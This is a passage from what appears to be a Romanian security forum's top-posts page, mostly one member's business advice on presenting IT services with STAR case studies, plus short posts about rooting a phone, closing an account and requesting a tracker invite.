are 0 credibilitate, poti scrie fraze de genul si adauga nume si locatii nelimitate. Daca te uiti pe site-urile profesioniste au "studii de caz". Acestea trebuie pastrate succint si in metoda STAR (Situation, Task, Action, Result). Adica ce probleme avea clientul de a apelat la tine (in acest fel potentialii clienti se identifica / raporteaza mai usor si se vad in pielea celor care au apelat la tine). Apoi ce ti-au dat tie sa faci (in subconstient asta le arata ca pot avea incredere in tine cu x, y, z.). Cum ai actionat (aici ai oportunitate de promovare sa arati cat de creativ esti, etc.) si apoi rezultatul (aici e punctul final de "vanzare" unde il convinge pe Badea din deal ca si ei pot avea acelasi rezultat sau mai bun daca apeleaza la serviciile tale). Am avut firme in trecut care mi-au oferit discount-uri considerabile in schimbul a unor astfel de cazuri de studiu sau testimoniale de genul. Acestea pot fi in ceva grafic si succint intr-un pdf sau un clip foarte scurt, sau combinat, etc. in functie de necesitate. 5. Pune-te la punct cu toate metodele eficiente (dpdv al timpului, costului, etc. inclusiv care sunt slabiciunile acestora) de a oferi ce vrei tu sa oferi. Nu vreau sa reiau punctul 1 de mai sus dar trebuie sa stii meserie daca vrei sa supravietuiesti. Este un process continuu, nu vei stii deajuns niciodata, dar orice client trebuie sa vada ca iti cunosti domeniul. Habarnistii supravietuiesc doar de pe prosti care nu stiu mai bine. Nu ma intelege gresit, se pot face bani multi si de pe prosti (ex: https://www.fiverr.com/gabonne) dar banuiesc ca nu vrei sa te axezi pe "nisa" asta. Tu spui ca oferi Suport IT, Marketing online, Identificare brand, Creare de aplicatii, Plan de dezvoltare. - din punctul meu de vedere la asta ajungi in timp cand ai un minim 50 angajati. Daca cineva vine de exemplu la tine si vrea sa le oferi toata gama pentru o firma mica de termopane ce faci, le pierzi timpul si banii sau ii refuzi ca habar nu ai? De exemplu daca pe langa un intranet in firma vrea solutii de back-ups zilnic, o aplicatie bespoke de CRM, plati, furnizori, etc. + plan de dezvoltare online, etc. Trebuie sa ai capabilitatea sa oferi ceea ce spui ca oferi. Si in ziua de azi lumea ca sa te pastreze ca si furnizor asteapta si sfaturi (mini-consultanta) in domeniu care vin cu produsul sa vada ca iti pasa de ei. De exemplu le spui uite putem face cum spui tu (full-back up zilnic de ex) dar poti face si incremental (e mai rapid, cost-efficient, etc.). In astfel de domenii devii si un fel de consultant si daca nu ai habar de ce vorbesti doar le pierzi vremea si banii si apoi iti iei talpa. Axeaza-te pe ceva ce stii foarte bine si apoi poti sa cresti organic. Poti sa legi colaborari cu altii care se pricep in alte domenii - cu cat colaborezi mai bine cu atat iesi mai ok. Cam atat deocamdata referitor la site si la tine... cand/daca mai am chef o sa scriu ceva si de idei de promovare..
  43. 1 point
    :))))))) vai de pl. noastra
  44. 1 point
  45. 1 point
    Ceva nou: hackyard. Ceva etic: hackpedia Ceva bun: RST Comparati si voi. Cam asta imi placea aici, partea de blackhat. Asa inveti mult mai multe decat pe partea etica. Libertate. Partea cu parolele suna bine, o sa vad ce facem zilele astea, inca nu e totul gata. Si am mai multe idei.
  46. 0 points
    Vreau sa inchid contul pe Romanian Security Team Security, cum procedez?
  47. 0 points
    Recomand xda cum a zis QKQL cauta un tutorial cu reviews pozitive ca daca il faci gresit root-u o sa stai 2-3-4 zile poate sa il faci inapoi ^^
  48. -1 points
    SEO, Benone mai respiri? Ai pe aici categoria de blog
  49. -2 points
  50. -2 points
    Daca poate sa imi dea si mie cnv un cod de FileList va rog
  • Create New...